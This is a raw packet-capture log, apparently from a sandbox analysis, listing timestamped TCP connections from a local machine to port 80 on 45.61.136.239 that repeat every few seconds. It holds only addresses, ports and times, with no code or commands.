Jul 4, 2024 08:23:13.533010960 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.533113003 CEST	80	49747	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.533154011 CEST	49747	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.679685116 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.684634924 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.684866905 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.686996937 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.692053080 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:13.692156076 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:13.697046995 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.522528887 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.522722006 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.522736073 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.522759914 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.522772074 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.522774935 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.522790909 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.522805929 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.522828102 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.522835970 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.523030996 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.523045063 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.523066044 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.523080111 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.523106098 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.527491093 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.527858973 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.527885914 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.527896881 CEST	80	49748	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.527915955 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.532692909 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.532692909 CEST	49748	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.678591013 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.683629036 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.683737040 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.685864925 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.691032887 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:16.691210032 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:16.696542025 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572016954 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572062969 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572073936 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572118044 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572129965 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572153091 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.572199106 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.572227001 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572237015 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572268009 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.572360992 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572370052 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572376966 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.572407007 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.572428942 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.577023983 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.577106953 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.577157021 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.577197075 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.577208042 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.577238083 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.577250004 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.577295065 CEST	80	49749	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.577333927 CEST	49749	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.725825071 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.730950117 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.731091022 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.733205080 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.738003016 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:19.738110065 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:19.743427038 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699068069 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699095964 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699117899 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699208975 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699223995 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699317932 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699327946 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.699338913 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699385881 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.699501038 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699551105 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699562073 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.699606895 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.699640036 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.699801922 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.704305887 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.704344034 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.704355001 CEST	80	49750	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.704372883 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.704405069 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.704504013 CEST	49750	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.860094070 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.865283012 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.865371943 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.867672920 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.872576952 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:22.872654915 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:22.877526999 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.554702997 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.554764986 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.554775953 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.554867983 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.554944992 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.554956913 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.555006027 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.555058956 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.555069923 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.555083990 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.555102110 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.555104971 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.555119038 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.555130005 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.555138111 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.555161953 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.555428982 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.559964895 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.559977055 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.559995890 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.560034990 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.560077906 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.560096025 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.560106039 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.560141087 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.560308933 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.560321093 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.560334921 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.560353041 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.560376883 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.560412884 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.560424089 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.560465097 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.561270952 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.561292887 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.561306000 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.561319113 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.561348915 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.561423063 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.561434984 CEST	80	49751	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.561471939 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.561496019 CEST	49751	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.691581964 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.696429014 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.696540117 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.698637962 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.703500986 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:26.703630924 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:26.708399057 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.474637032 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.474664927 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.474684954 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.474805117 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.474853039 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.474889040 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.474973917 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.475001097 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.475013971 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.475049019 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.475173950 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.475481987 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.475493908 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.475508928 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.475544930 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.475572109 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.479984045 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.479995966 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.480012894 CEST	80	49752	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.480042934 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.480082989 CEST	49752	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.613594055 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.618773937 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.618871927 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.621057987 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.631129980 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:29.631213903 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:29.636837006 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957206011 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957237959 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957252026 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957334042 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:32.957355976 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957367897 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957385063 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957469940 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:32.957478046 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957551956 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957561016 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957633018 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:32.957637072 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.957712889 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:32.958026886 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:32.962287903 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.962364912 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:32.962423086 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.962469101 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:32.962686062 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.962698936 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.962733030 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:32.963310957 CEST	80	49753	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:32.963365078 CEST	49753	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:33.097259045 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:33.102274895 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:33.102365971 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:33.104567051 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:33.109308958 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:33.109364986 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:33.115163088 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302592993 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302637100 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302650928 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302683115 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302692890 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302711964 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302752972 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.302906036 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.302932978 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302943945 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302963018 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.302982092 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.303014040 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.303071022 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.303414106 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.307703972 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.307764053 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.307813883 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.307825089 CEST	80	49754	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.307852983 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.307869911 CEST	49754	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.442368031 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.448534012 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.448641062 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.450860023 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.456551075 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:36.456634045 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:36.461483002 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542069912 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542093039 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542113066 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542171001 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.542258978 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542269945 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542288065 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542301893 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542315960 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.542340040 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.542489052 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542510986 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542529106 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.542581081 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.542607069 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.542646885 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.547091007 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.547102928 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.547110081 CEST	80	49755	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.547168970 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.547200918 CEST	49755	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.693348885 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.703654051 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.703872919 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.706239939 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.711498022 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:39.711560011 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:39.718759060 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700489044 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700503111 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700522900 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700556040 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700577974 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700611115 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.700619936 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700685024 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.700689077 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700779915 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700789928 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700810909 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.700828075 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.700862885 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.701078892 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.705614090 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.705764055 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.705868959 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.705878973 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.705885887 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.705890894 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.705895901 CEST	80	49756	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.705949068 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.705992937 CEST	49756	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.847172022 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.852428913 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.852525949 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.854659081 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.862430096 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:42.862514019 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:42.869466066 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676078081 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676100969 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676120996 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676229000 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.676333904 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676347971 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676367044 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676379919 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676397085 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676398039 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.676527977 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676605940 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.676605940 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.676697016 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.676753044 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.676753044 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.681113005 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.681164980 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.681185007 CEST	80	49757	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.681607962 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.681607962 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.681607962 CEST	49757	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.818557978 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.823589087 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.823668003 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.825819016 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.830640078 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:45.830709934 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:45.835655928 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112498045 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112524033 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112550974 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112602949 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112615108 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112643957 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.112709045 CEST	49758	80	192.168.2.4	45.61.136.239
Jul 4, 2024 08:23:49.112771034 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112781048 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112796068 CEST	80	49758	45.61.136.239	192.168.2.4
Jul 4, 2024 08:23:49.112816095 CEST	49758	80	192.168.2.4	45.61.136.239
